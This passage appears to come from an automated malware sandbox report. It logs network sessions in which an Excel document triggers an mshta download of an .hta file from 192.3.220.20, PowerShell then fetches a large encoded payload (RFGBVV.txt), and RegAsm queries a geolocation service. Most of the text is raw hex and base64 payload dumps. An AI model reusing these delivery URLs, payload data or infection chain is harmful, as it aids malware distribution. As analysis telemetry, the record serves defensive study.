                                                                                                                                            Oct 4, 2024 11:56:13.410053015 CEST1236INData Raw: 41 56 4e 4d 56 44 53 31 67 54 4e 30 55 44 4a 31 77 51 4e 45 55 44 41 30 77 50 4e 34 54 44 36 30 51 4f 4e 55 54 44 76 30 51 4c 4e 77 53 44 72 30 77 4a 4e 59 53 44 69 30 41 48 4e 6f 52 44 5a 30 51 46 4e 51 52 44 51 30 67 43 4e 67 51 44 48 30 77 41
                                                                                                                                            Data Ascii: AVNMVDS1gTN0UDJ1wQNEUDA0wPN4TD60QONUTDv0QLNwSDr0wJNYSDi0AHNoRDZ0QFNQRDQ0gCNgQDH0wANIMD8zw+MoPD5zA9MIPDxAAQAcBgBQDQOokDJAAAAMAgBADAAA0D8AAAAMAgBwCAOwjD64QJOQiDj4gFO4gDF3w/N4fD63A9NYeDi3w2NodDS3Q0NAdDPAAAAwAgBQCgNAZDP1AcN8WDu1QbNwWDr1gaNcWDm1QZN
                                                                                                                                            Oct 4, 2024 11:56:13.410101891 CEST1236INData Raw: 6e 44 76 35 51 62 4f 73 6d 44 70 35 77 5a 4f 55 6d 44 6a 35 51 59 4f 38 6c 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53 4f 63 6b 44 46 35 77 51 4f 45 67 44 2f 34 51 50 4f 73 6a 44 35 34 77 4e 4f 55 6a 44
                                                                                                                                            Data Ascii: nDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4wKOkiDn4QJOMiDh4wHO0hDb4QGOchDV4wEOEhDP4QDOsgDJ4wBOUgDD4QwN8fD93w+NkfD33Q9NMfDx3w7N0eDr3Q6NceDl3w4NEeDf3Q3NsdDZ3w1NUdDT3Q0N8cDN3wyNkcDH3QxNMcDB2wvN0bD7
                                                                                                                                            Oct 4, 2024 11:56:13.410135031 CEST1236INData Raw: 77 6e 4f 34 70 44 64 36 41 6e 4f 73 70 44 61 36 51 6d 4f 67 70 44 58 36 67 6c 4f 55 70 44 55 36 77 6b 4f 49 70 44 52 36 41 6b 4f 38 6f 44 4f 36 51 6a 4f 77 6f 44 4c 36 67 69 4f 6b 6f 44 49 36 77 68 4f 59 6f 44 46 36 41 68 4f 4d 6f 44 43 36 51 67
                                                                                                                                            Data Ascii: wnO4pDd6AnOspDa6QmOgpDX6glOUpDU6wkOIpDR6AkO8oDO6QjOwoDL6giOkoDI6whOYoDF6AhOMoDC6QgOAkD/5gfO0nD85weOonD55AeOcnD25QdOQnDz5gcOEnDw5wbO4mDt5AbOsmDq5QaOgmDn5gZOUmDk5wYOImDh5AYO8lDe5QXOwlDX5gVOUlDU4QGOghDX4gFAAAA4AUAwAAAA1AdNIXDw1gbNwWDq1AaNYWDk1gYN
                                                                                                                                            Oct 4, 2024 11:56:13.410166025 CEST1236INData Raw: 6b 44 2f 35 51 66 4f 73 6e 44 35 35 77 64 4f 55 6e 44 7a 35 51 63 4f 38 6d 44 74 35 77 61 4f 6b 6d 44 6e 35 51 5a 4f 4d 6d 44 68 35 77 58 4f 30 6c 44 62 35 51 57 4f 63 6c 44 56 35 77 55 4f 45 6c 44 50 35 51 54 4f 73 6b 44 4a 35 77 52 4f 55 6b 44
                                                                                                                                            Data Ascii: kD/5QfOsnD55wdOUnDz5QcO8mDt5waOkmDn5QZOMmDh5wXO0lDb5QWOclDV5wUOElDP5QTOskDJ5wROUkDD5QAO8jD94wOOkjD34QNOMjDx4wLO0iDr4QKOciDl4wIOEiDf4QHOshDZ4wFOUhDT4QEO8gDN4wCOkgDH4QBOMgDB3w/N0fD73Q+NcfD13w8NEfDv3Q7NseDp3w5MAPDvzg7M0ODszw6MoODpzA6McODmzQ5MQODj
                                                                                                                                            Oct 4, 2024 11:56:13.410197973 CEST1236INData Raw: 6f 39 50 77 2b 54 61 2f 6b 30 50 39 38 54 4d 2f 30 78 50 52 34 7a 72 2b 63 71 50 4a 36 54 67 2b 6b 6e 50 78 35 54 61 2b 6f 52 50 2b 7a 54 63 38 63 47 50 39 77 44 4d 37 34 38 4f 39 75 7a 74 37 49 37 4f 73 75 6a 6a 37 55 34 4f 38 74 7a 5a 36 4d 75
                                                                                                                                            Data Ascii: o9Pw+Ta/k0P98TM/0xPR4zr+cqPJ6Tg+knPx5Ta+oRP+zTc8cGP9wDM748O9uzt7I7Osujj7U4O8tzZ6MuOKrjg6AnOjpDW6QjOEkz950dOyljM48zN/az4245MgPj2xobMxFTTxoTMuEjIxYBMRDTuw4IMvBDXwAFMEBzHAAAAMCQBgBAAA8D9/I7Pp+zo/g5PN+zc/00Pz8TA+ktPp6Tk+4iPS0zt9waPO2Dh9EXPmtDV6UcO
                                                                                                                                            Oct 4, 2024 11:56:13.410231113 CEST1236INData Raw: 74 7a 49 37 73 78 4f 51 73 7a 42 36 45 76 4f 62 72 44 6f 36 55 70 4f 4d 71 7a 57 36 4d 56 4f 47 6e 54 74 35 55 61 4f 64 6d 44 6a 35 77 48 4f 37 68 6a 4a 34 59 78 4e 35 66 54 68 32 41 74 4e 70 56 54 34 31 51 5a 4e 4a 57 54 64 31 67 56 4e 68 51 7a
                                                                                                                                            Data Ascii: tzI7sxOQszB6EvObrDo6UpOMqzW6MVOGnTt5UaOdmDj5wHO7hjJ4YxN5fTh2AtNpVT41QZNJWTd1gVNhQz3046MyOzozc5MHOjazI2M4IT4yUtMJLTtykqMHJzPyEiMZITEykQM9GjXxYBM6DDvwILMQCDfw8FMwATGAAAA8CABQDAAA8j6/U9PF+TY+glP00ji9AUPjwD88gNPPxzN8syO1vj47Q6OVujV6EvOXqDj68nOcpjP
                                                                                                                                            Oct 4, 2024 11:56:13.410264969 CEST1236INData Raw: 77 39 4d 4c 50 54 71 7a 38 35 4d 53 4f 54 69 7a 38 32 4d 65 4e 54 4b 7a 41 79 4d 50 4d 7a 41 79 67 75 4d 58 4c 6a 6f 79 73 70 4d 75 4a 7a 5a 78 34 61 4d 79 45 6a 48 77 49 43 41 41 45 41 6b 41 51 41 67 41 41 41 41 2f 63 39 50 6e 2b 6a 64 2f 59 53
                                                                                                                                            Data Ascii: w9MLPTqz85MSOTiz82MeNTKzAyMPMzAyguMXLjoyspMuJzZx4aMyEjHwICAAEAkAQAgAAAA/c9Pn+jd/YSPzxzS4kIOlUj+0MLNvSzq0cKNjSzn0sJNXKT4yQoMVFj6wcLMFCAAAgDAEAHAAAgP77D8+4QPk3ju90YP71zB8s0OzvTy7M6O9tDO4wCOagDFyUmMfFD7xYeMIGTWx8UMFBAAAwDAEAGAAAgPg3D49kBP/zD78INP
                                                                                                                                            Oct 4, 2024 11:56:13.410296917 CEST1236INData Raw: 52 44 51 30 77 44 4e 34 51 44 4e 30 41 7a 4d 6e 4f 44 4d 7a 77 79 4d 6f 4d 44 4a 7a 41 79 4d 63 4d 44 47 7a 51 68 4d 2f 4a 44 43 79 51 67 4d 41 45 44 2f 78 67 66 4d 30 48 44 38 78 77 65 4d 6a 42 41 41 41 51 47 41 44 41 4e 41 41 41 77 50 50 2f 54
                                                                                                                                            Data Ascii: RDQ0wDN4QDN0AzMnODMzwyMoMDJzAyMcMDGzQhM/JDCyQgMAED/xgfM0HD8xweMjBAAAQGADANAAAwPP/Tv/s5PJ+Ta/QlP30je2gcNMND0zYiMVLDzygrMcJTUyMkM1IDKyIRM9Hj2xMcMuGjnxAZMEGDexoWMbFTQwUCAAAATAMAwAAAA+sqPr0Tl94YPf0DF8cPPHzTt8IIP1xza70HAAAAJAMAsAkjs5gaOelDV5ESOUgjZ
                                                                                                                                            Oct 4, 2024 11:56:13.415208101 CEST1236INData Raw: 55 42 50 52 7a 44 78 38 30 4c 50 33 79 54 73 38 41 4b 50 44 79 6a 62 38 67 47 50 67 78 7a 53 38 34 44 50 79 77 44 4a 37 38 66 4f 4e 6d 6a 68 35 6f 58 4f 69 68 6a 36 34 34 4e 4f 35 67 7a 4d 33 6f 39 4e 50 66 54 67 33 49 33 4e 73 64 44 5a 33 67 67
                                                                                                                                            Data Ascii: UBPRzDx80LP3yTs8AKPDyjb8gGPgxzS84DPywDJ78fONmjh5oXOihj644NO5gzM3o9NPfTg3I3NsdDZ3ggNgbzW24iNpYDF18fNjXTz1UcN8Wzq1wANtTD20sMN7Sjp0MFNFRDH0kwMwPT1zU8M9ODpzo3MqNjYzo0MqMjCyktMBLjoycoMqJzSy4iMpIjFywgMCED/xcfMsHD5xwdMUHTzxYcM/GDuxEbMqGzox0ZMXGTkxsYM


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            4192.168.2.2249178178.237.33.5080896C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 11:56:15.821145058 CEST71OUTGET /json.gp HTTP/1.1
                                                                                                                                            Host: geoplugin.net
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Oct 4, 2024 11:56:16.440777063 CEST1170INHTTP/1.1 200 OK
                                                                                                                                            date: Fri, 04 Oct 2024 09:56:16 GMT
                                                                                                                                            server: Apache
                                                                                                                                            content-length: 962
                                                                                                                                            content-type: application/json; charset=utf-8
                                                                                                                                            cache-control: public, max-age=300
                                                                                                                                            access-control-allow-origin: *
                                                                                                                                            Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 30 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                                                                                                            Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            5192.168.2.2249179192.3.220.20802104C:\Windows\System32\mshta.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 11:56:16.018712997 CEST469OUTGET /97/ug/Newprojectupdatedwithmegreat.hta HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: fr-FR
                                                                                                                                            UA-CPU: AMD64
                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                            If-Modified-Since: Fri, 04 Oct 2024 06:11:18 GMT
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Host: 192.3.220.20
                                                                                                                                            If-None-Match: "1d4f7-623a08a0dc3cf"
                                                                                                                                            Oct 4, 2024 11:56:16.486123085 CEST275INHTTP/1.1 304 Not Modified
                                                                                                                                            Date: Fri, 04 Oct 2024 09:56:16 GMT
                                                                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                            Last-Modified: Fri, 04 Oct 2024 06:11:18 GMT
                                                                                                                                            ETag: "1d4f7-623a08a0dc3cf"
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                            Connection: Keep-Alive


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            6192.168.2.2249181192.3.220.20803956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 11:56:30.903240919 CEST75OUTGET /97/RFGBVV.txt HTTP/1.1
                                                                                                                                            Host: 192.3.220.20
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Oct 4, 2024 11:56:31.371680021 CEST1236INHTTP/1.1 200 OK
                                                                                                                                            Date: Fri, 04 Oct 2024 09:56:31 GMT
                                                                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                            Last-Modified: Fri, 04 Oct 2024 05:54:52 GMT
                                                                                                                                            ETag: "a1000-623a04f4ff97e"
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Content-Length: 659456
                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: text/plain
                                                                                                                                            Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41 6a 41 63 41 45 41 34 44 74 2b 41 71 50 59 36 44 68 2b 77 6e 50 30 35 44 62 2b 67 6d 50 67 35 44 54 2b 51 6b 50 77 34 44 4b 2b 41 69 50 59 34 44 46 2b 41 68 50 4d 34 44 43 2b 41 51 50 38 33 44 39 39 41 65 50 59 33 44 78 39 77 62 50 30 32 44 72 39 67 [TRUNCATED]
                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwDq8gIPsxDT8wCPIsD/7w9OwuDl7Q3OUtDM7AhOsrDz6wqOMqDb6QkOooDE6ggOEoDA5wfO4nD95A6M0MDMyQqMgKDhyAoM8JDcyglMIJDOygiMYED6xgdMUHD0xwcMIHDxxAcM8GDuxwaMoGDpxAaMcGDmxQZMQGDjxgYM4FDdxAHAAAAjAcAEA4Dt+AqPY6Dh+wnP05Db+gmPg5DT+QkPw4DK+AiPY4DF+AhPM4DC+AQP83D99AePY3Dx9wbP02Dr9gYPA2De9QXPY1DO9QTPYwD+8gNP4yDm8gHPYxDO8gxO4vD27g7OYuDe7g1O4sDG6gvOYrDu6gpO4pDW6gjO0oDG5gfOYnDu5gZO8lDe5AXOQlDM5ABOwjD04ALOQiDc4AFOwgDF4gwNofDy3g6NIeDa3g0NocDC2QvNsbD62AuNYbD02wsNgaDm2woNoZDW2QlN4YDN2whNYYDE1QfNwXD61AZNEWDZ1gVNQVDP1QTNwUDL1QSNcUDF1AAN4TD90APNoTD40gNNETDv0gKNgSDn0gJNQSDi0AINsRDZ0AGNYRDU0gENERDK0QCNMMD/zg8MAPDtzQ6MwNDazw1MMNDGzAxMEID9yAsM4KDrywpMoJDYyQlMEJDEygQM8HD7xgbMwGDpxQZMgFDWxwUM8EDCxAAM0DD7wQOMwCDqwwJMUCDjwgFMQBDRwwDM0ADAAAQAQCgBgDwP4/D7/w9Po+Do/Q5PE+DU/g0P88DL/wxPI4Dx+wrPw6Do+ApP85DO+AjPk4DF9AePYnDi5AXOolDZ5AWOQlDT5wTOkkDH5gROUkDE5wQOIgD+4QPOkjDz4QMOAjDv4
                                                                                                                                            Oct 4, 2024 11:56:31.371743917 CEST1236INData Raw: 67 4c 4f 30 69 44 73 34 41 4b 4f 63 69 44 6a 34 51 48 4f 73 68 44 61 34 51 47 4f 67 68 44 58 34 77 45 4f 49 68 44 4f 34 41 43 4f 59 67 44 46 34 41 42 4f 4d 67 44 43 33 67 2f 4e 30 66 44 35 33 77 38 4e 45 66 44 77 33 77 37 4e 73 65 44 71 33 67 35
                                                                                                                                            Data Ascii: gLO0iDs4AKOciDj4QHOshDa4QGOghDX4wEOIhDO4ACOYgDF4ABOMgDC3g/N0fD53w8NEfDw3w7NseDq3g5NUeDh3w2NkdDY3A1N4cDM3wyNocDJ3QhN8bD+2AuNYbD12AtNMbDy2grN0aDp2woNEaDg2AnNsZDX2QkN8YDO2QjNkYDI2ARN4XD81weNoXD51QdNQXDw1gaNgWDn1gZNUWDh1AYNwVDW1AVNMVDS1gTN0UDJ1wQN
                                                                                                                                            Oct 4, 2024 11:56:31.371778011 CEST448INData Raw: 78 44 58 38 51 46 50 4d 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 6e 37 51 35 4f 4d 75 44 68 37 77 33 4f 30 74 44
                                                                                                                                            Data Ascii: xDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj
                                                                                                                                            Oct 4, 2024 11:56:31.371809959 CEST1236INData Raw: 63 44 48 33 51 78 4e 4d 63 44 42 32 77 76 4e 30 62 44 37 32 51 75 4e 63 62 44 31 32 77 73 4e 45 62 44 76 32 51 72 4e 73 61 44 70 32 77 70 4e 55 61 44 6a 32 51 6f 4e 38 5a 44 64 32 77 6d 4e 6b 5a 44 58 32 51 6c 4e 4d 5a 44 52 32 77 6a 4e 30 59 44
                                                                                                                                            Data Ascii: cDH3QxNMcDB2wvN0bD72QuNcbD12wsNEbDv2QrNsaDp2wpNUaDj2QoN8ZDd2wmNkZDX2QlNMZDR2wjN0YDL2QiNcYDF2wgNEUD/1QfNsXD51wdNUXDz1QcN8WDt1waNkWDn1QZNMWDh1wXN0VDb1QWNEQD/0QPNsTD50wNNUTDz0QMN8SDt0wKNkSDn0QJNMSDh0wHN0RDb0QGNcRDV0wENERDP0QDNsQDJzg0M8MDMzQyMYMDD
                                                                                                                                            Oct 4, 2024 11:56:31.371843100 CEST1236INData Raw: 67 62 4e 77 57 44 71 31 41 61 4e 59 57 44 6b 31 67 59 4e 41 57 44 65 31 41 58 4e 6f 56 44 59 31 67 56 4e 51 56 44 53 31 41 55 4e 34 55 44 4d 31 67 53 4e 67 55 44 47 31 41 52 4e 49 55 44 41 30 67 50 4e 77 54 44 36 30 41 4f 4e 59 54 44 30 30 67 4d
                                                                                                                                            Data Ascii: gbNwWDq1AaNYWDk1gYNAWDe1AXNoVDY1gVNQVDS1AUN4UDM1gSNgUDG1ARNIUDA0gPNwTD60AONYTD00gMNATDu0ALNoSDo0gJNQSDi0AIN4RDc0gGNgRDW0AFNIRDQ0gDNwQDK0ACNYQDE0gANAMD+zA/MoPD4zg9MQPDyzA8M4ODszg6MgODmzA5MIODgzg3MwNDazA2MYNDUzg0MANDOzAzMoMDIzgxMQMDCzAgM4LD8yguM
                                                                                                                                            Oct 4, 2024 11:56:31.371876955 CEST1236INData Raw: 4f 44 70 7a 41 36 4d 63 4f 44 6d 7a 51 35 4d 51 4f 44 6a 7a 67 34 4d 45 4f 44 67 7a 77 33 4d 34 4e 44 64 7a 41 33 4d 73 4e 44 61 7a 51 32 4d 67 4e 44 58 7a 67 31 4d 55 4e 44 55 7a 77 30 4d 49 4e 44 52 7a 41 30 4d 38 4d 44 4f 7a 51 7a 4d 77 41 44
                                                                                                                                            Data Ascii: ODpzA6McODmzQ5MQODjzg4MEODgzw3M4NDdzA3MsNDazQ2MgNDXzg1MUNDUzw0MINDRzA0M8MDOzQzMwADzwQMM8CDtwwKMkCDnwQJMMCDhwwHM0BDbwQGMcBDVwwEMEBDPwQDMsADJwwBMUADDwQAAAIAoAUAoA8D//Q/Ps/D5/w9PU/Dz/Q8P8+Dt/w6Pk+Dn/Q5PM+Dh/w3P09Db/Q2Pc9DV/w0PE9DP/QzPs8DJ/wxPU8DD
                                                                                                                                            Oct 4, 2024 11:56:31.371910095 CEST1236INData Raw: 77 61 50 4f 32 44 68 39 45 58 50 6d 74 44 56 36 55 63 4f 49 5a 54 2f 32 6f 73 4e 54 59 44 41 31 45 65 4e 53 58 54 71 31 55 5a 4e 74 55 6a 4a 31 38 52 4e 59 45 44 31 41 41 41 41 55 42 51 42 51 42 67 50 50 37 44 79 2b 45 70 50 4a 32 44 6c 36 6f 6d
                                                                                                                                            Data Ascii: waPO2Dh9EXPmtDV6UcOIZT/2osNTYDA1EeNSXTq1UZNtUjJ18RNYED1AAAAUBQBQBgPP7Dy+EpPJ2Dl6omOjpDL6QiMRFT5woFAAAAIAUAQAAAA/49PH/DN+ErPM0Tk90SPNwju8sjOamTu5caOVmjH4wOOcjT024uNdXj2yEoM5JzYy0kMyAD+AAAAABQBwAAAA8Dn/AgPB7jA7UYORhzb4AFOIcT+345NKdDQ2YvNubTm1EfN
                                                                                                                                            Oct 4, 2024 11:56:31.371942997 CEST1236INData Raw: 75 6a 56 36 45 76 4f 58 71 44 6a 36 38 6e 4f 63 70 6a 50 35 45 59 4f 34 67 7a 35 34 6f 4d 4f 32 69 54 4a 32 45 74 4e 43 5a 7a 49 32 51 51 4e 5a 54 7a 62 7a 49 30 4d 59 4d 6a 44 79 34 6b 4d 6b 49 44 42 78 45 64 4d 34 42 44 37 77 51 4f 41 41 41 41
                                                                                                                                            Data Ascii: ujV6EvOXqDj68nOcpjP5EYO4gz54oMO2iTJ2EtNCZzI2QQNZTzbzI0MYMjDy4kMkIDBxEdM4BD7wQOAAAAaAQAwAAAA/MzPr4zi+kmPO5DR+cQPt2zl8kPPGzzg8UDPrsDv7whOArTQ68hOCkzz5MbOCmDV4sMOvijh401NffTw3g5NvdDA2IuNDbTu2MqNEaTT1YdNGXzu1QZNbVDP0ALNASTY0UENFMz7zk2MYNzQzAhMuKzp
                                                                                                                                            Oct 4, 2024 11:56:31.371974945 CEST1236INData Raw: 41 67 50 67 33 44 34 39 6b 42 50 2f 7a 44 37 38 49 4e 50 2f 79 54 70 37 63 37 4f 78 75 7a 48 36 6f 52 4f 69 6c 7a 57 35 41 55 4f 36 6b 7a 4d 35 55 53 4f 61 6b 7a 45 34 59 4f 4f 4e 6a 7a 4b 32 51 71 4e 68 59 44 42 31 77 66 4e 7a 58 7a 78 31 55 45
                                                                                                                                            Data Ascii: AgPg3D49kBP/zD78INP/yTp7c7OxuzH6oROilzW5AUO6kzM5USOakzE4YOONjzK2QqNhYDB1wfNzXzx1UEN0TD70kJNhJjBwgDMoAAAAQFAEAFA/M+Pk+TI+ImPI1z29AdP+2Du7cZO5nDU50wNtfTY3AkN1bT62UtNPbTx2orN2YjL2YiNXYTD2IQNOXjl08INURjFzo/MmPjmzY3M5Iz8yktMyKjfycjMuITHxgfMgHD2xwcM
                                                                                                                                            Oct 4, 2024 11:56:31.372008085 CEST1236INData Raw: 6b 6a 73 35 67 61 4f 65 6c 44 56 35 45 53 4f 55 67 6a 5a 34 34 46 4f 56 68 44 47 34 38 77 4e 31 66 54 66 33 45 33 4e 4d 59 44 61 31 45 56 4e 46 56 44 46 31 34 51 4e 48 51 54 2b 30 6b 4e 4e 39 53 54 73 30 41 4b 4e 46 53 7a 64 30 30 47 4e 6a 52 7a
                                                                                                                                            Data Ascii: kjs5gaOelDV5ESOUgjZ44FOVhDG48wN1fTf3E3NMYDa1EVNFVDF14QNHQT+0kNN9STs0AKNFSzd00GNjRzR0MDNLMD8zo+McPzuzs6MmODlxcDMTAAAAwFADAKAAAwPE/TN+wdP5wz44wqNwbD62IuNKbTK00FNMNTSy4tMZLTwycnMXJzBxYbM1FjSwEPMfDz1w8FAAAAQAMAkA8Dq/w5PK+TZ/s1PL9jR/4zPO8TC/QgP47T0
                                                                                                                                            Oct 4, 2024 11:56:31.376957893 CEST1236INData Raw: 45 62 4d 71 47 7a 6f 78 30 5a 4d 58 47 54 6b 78 73 59 4d 46 47 6a 55 78 6b 55 4d 35 45 54 4b 78 6b 52 4d 50 45 54 42 77 38 50 4d 36 44 54 38 77 55 4f 4d 64 44 54 31 77 30 4d 4d 47 44 7a 76 77 67 4c 4d 78 43 6a 71 77 4d 4b 4d 63 43 6a 6c 77 41 4a
                                                                                                                                            Data Ascii: EbMqGzox0ZMXGTkxsYMFGjUxkUM5ETKxkRMPETBw8PM6DT8wUOMdDT1w0MMGDzvwgLMxCjqwMKMcCjlwAJMKCDhw4HMeBzVwwEMDBTLwgAMDAAABgGADAFA/09PY/D0/o8PB/zm/Q3Pu9TX/U1Pm8TG/AxPB4T9+otPO6Tc+4lPP5jR+sjPu4TJ98ePo3T29IZPK2Tg88OPkzTy8sLPoyDl84IP2xTY8sFPDxzL8cyOfvT27E8O


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            0192.168.2.2249165213.183.76.214433432C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-04 09:55:54 UTC321OUTGET /noDe HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            UA-CPU: AMD64
                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                            Host: stylite.io
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-10-04 09:55:54 UTC427INHTTP/1.1 302 Found
                                                                                                                                            Content-Length: 80
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Date: Fri, 04 Oct 2024 09:55:54 GMT
                                                                                                                                            Location: http://192.3.220.20/97/ug/Newprojectupdatedwithmegreat.hta
                                                                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                            Vary: Accept
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-Dns-Prefetch-Control: off
                                                                                                                                            X-Download-Options: noopen
                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                            X-Xss-Protection: 0
                                                                                                                                            Connection: close
                                                                                                                                            2024-10-04 09:55:54 UTC80INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 32 30 2e 32 30 2f 39 37 2f 75 67 2f 4e 65 77 70 72 6f 6a 65 63 74 75 70 64 61 74 65 64 77 69 74 68 6d 65 67 72 65 61 74 2e 68 74 61
                                                                                                                                            Data Ascii: Found. Redirecting to http://192.3.220.20/97/ug/Newprojectupdatedwithmegreat.hta


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            1192.168.2.2249167213.183.76.214433672C:\Windows\System32\mshta.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-04 09:55:56 UTC345OUTGET /noDe HTTP/1.1
